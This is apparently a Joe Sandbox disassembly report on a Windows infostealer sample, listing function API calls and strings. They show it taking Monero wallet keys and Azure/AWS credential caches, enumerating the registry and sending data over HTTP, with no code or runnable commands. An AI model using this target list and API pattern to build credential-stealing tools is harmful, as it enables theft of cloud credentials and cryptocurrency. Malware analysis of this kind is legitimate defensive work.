Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 7d7f1faebd876e2726635bc955086df484ba164ffb525e87f51210faf19f35fd
Instruction ID: 6cc70c54176aee171ee1e01ad9cdcad9908209247e721559581d962d8a02548d
Opcode Fuzzy Hash: 7d7f1faebd876e2726635bc955086df484ba164ffb525e87f51210faf19f35fd
Instruction Fuzzy Hash: 95E123719105089BDB06EBA0DD96EEE7778BF14301F104255F907BB0A1EF35AA0DEB62

Function 00344880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00344915
StrCmpCA.SHLWAPI(?,0127E768), ref: 0034493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00344ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00360DDB,00000000,?,?,00000000,?,",00000000,?,0127E8A8), ref: 00344DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00344E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00344E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00344E49
InternetCloseHandle.WININET(00000000), ref: 00344EAD
InternetCloseHandle.WININET(00000000), ref: 00344EC5
HttpOpenRequestA.WININET(00000000,0127E7D8,?,0127DFF8,00000000,00000000,00400100,00000000), ref: 00344B15

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

InternetCloseHandle.WININET(00000000), ref: 00344ECF

Strings

", xrefs: 00344BF2
", xrefs: 00344D33
------, xrefs: 003449BD
------, xrefs: 00344C69
------, xrefs: 00344B28

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 8872deef7c5e21ff6d15ce111c3ed167d1f6e3ae61a9517078ba8044c6d62352
Instruction ID: d91021983535b2ec174a55fbeccbcfa113ccd76f1c3ee7c791453d5059858bec
Opcode Fuzzy Hash: 8872deef7c5e21ff6d15ce111c3ed167d1f6e3ae61a9517078ba8044c6d62352
Instruction Fuzzy Hash: 7912BF719106189ADB16EB90DC52FEEB778BF14301F504299B9067A0A1EF702F4DEF62

Function 00358320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

RegOpenKeyExA.KERNEL32(00000000,0127B3F8,00000000,00020019,00000000,003605B6), ref: 003583A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
wsprintfA.USER32 ref: 00358459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0035847B
RegCloseKey.ADVAPI32(00000000), ref: 0035848C
RegCloseKey.ADVAPI32(00000000), ref: 00358499

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Strings

?, xrefs: 0035837A
%s\%s, xrefs: 0035844D
- , xrefs: 003585A3

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
Instruction ID: 64e09cb10532675955416ba166dd4172111353a768a202743fd145ba21c65c0d
Opcode Fuzzy Hash: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
Instruction Fuzzy Hash: 6C812D7191011CABEB29DB50CC91FEAB7B8FF18701F008299E909A6150DF756B89DFA1

Function 00346280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
StrCmpCA.SHLWAPI(?,0127E768), ref: 00346303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
HttpOpenRequestA.WININET(00000000,GET,?,0127DFF8,00000000,00000000,00400100,00000000), ref: 00346385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003463FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034646D
InternetCloseHandle.WININET(00000000), ref: 003464EF
InternetCloseHandle.WININET(00000000), ref: 003464F9
InternetCloseHandle.WININET(00000000), ref: 00346503

Strings

ERROR, xrefs: 00346407
ERROR, xrefs: 003464C9
GET, xrefs: 0034637C

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: c88df46d983d95a4cc0d17204ca28328c1cf1c6bbfef0b954fde11a963e42789
Instruction ID: e4013ae3073bcc008fea48efc0b58e6e050673e7f22e39b3cd29034a2633060a
Opcode Fuzzy Hash: c88df46d983d95a4cc0d17204ca28328c1cf1c6bbfef0b954fde11a963e42789
Instruction Fuzzy Hash: 84714E71A00218ABEF15DF90CC46FEE77B8FB45701F108199F90A6B190DBB46A89DF52

Function 00355510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003556A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355857

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 003552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 0035532F
Part of subcall function 003552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 00355383
Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 003553AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355A0C
Sleep.KERNEL32(0000EA60), ref: 00355A1B

Strings

ERROR, xrefs: 00355849
ERROR, xrefs: 0035577D
ERROR, xrefs: 00355693
ERROR, xrefs: 00355932
ERROR, xrefs: 00355636
ERROR, xrefs: 003559FE

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
Instruction ID: 6784a190b17e26556996cf15ab75efa8d34b5fb7953fa0129cf09f45acaad1f6
Opcode Fuzzy Hash: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
Instruction Fuzzy Hash: 3FE151719109049ADB16FBB0DC52EED7778AF54301F408629BD076A0B1EF346B4DEBA2

Function 00354D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00354DCD

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

lstrcat.KERNEL32(?,00000000), ref: 00354E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00354E59

Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92

lstrcat.KERNEL32(?,00000000), ref: 00354EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00354EE5

Part of subcall function 00354910: wsprintfA.USER32 ref: 003549B0
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,003608D2), ref: 003549C5
Part of subcall function 00354910: wsprintfA.USER32 ref: 003549E2
Part of subcall function 00354910: PathMatchSpecA.SHLWAPI(?,?), ref: 00354A1E
Part of subcall function 00354910: lstrcat.KERNEL32(?,0127E7C8), ref: 00354A4A
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FF8), ref: 00354A5C
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A70
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FFC), ref: 00354A82
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A96
Part of subcall function 00354910: CopyFileA.KERNEL32(?,?,00000001), ref: 00354AAC
Part of subcall function 00354910: DeleteFileA.KERNEL32(?), ref: 00354B31

Strings

*.*, xrefs: 00354DD8
Azure\.azure, xrefs: 00354DD3
Azure\.IdentityService, xrefs: 00354EEB
msal.cache, xrefs: 00354EF0
\.aws\, xrefs: 00354E4D
*.*, xrefs: 00354E64
Azure\.aws, xrefs: 00354E5F
\.azure\, xrefs: 00354DC1
\.IdentityService\, xrefs: 00354ED9

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 1ede2b89c30f2236299e9ebfc19e58bedcdc94d06ed63b22348adb294b3a35d3
Instruction ID: 9df7d16568f9bd1365522a4dbe87656185509a057c8722e2541d842716c7d0f2
Opcode Fuzzy Hash: 1ede2b89c30f2236299e9ebfc19e58bedcdc94d06ed63b22348adb294b3a35d3
Instruction Fuzzy Hash: 8C41D4BA95020867DB15F760EC47FED3378AB24705F004594B9896A0C5FEB46BCC9BA2

Function 00341310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
Part of subcall function 003412A0: RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
Part of subcall function 003412A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003412D7
Part of subcall function 003412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
Part of subcall function 003412A0: RegCloseKey.ADVAPI32(?), ref: 003412FF

lstrcat.KERNEL32(?,00000000), ref: 0034134F
lstrlen.KERNEL32(?), ref: 0034135C
lstrcat.KERNEL32(?,.keys), ref: 00341377

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0127A730,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01279050,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00341465

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
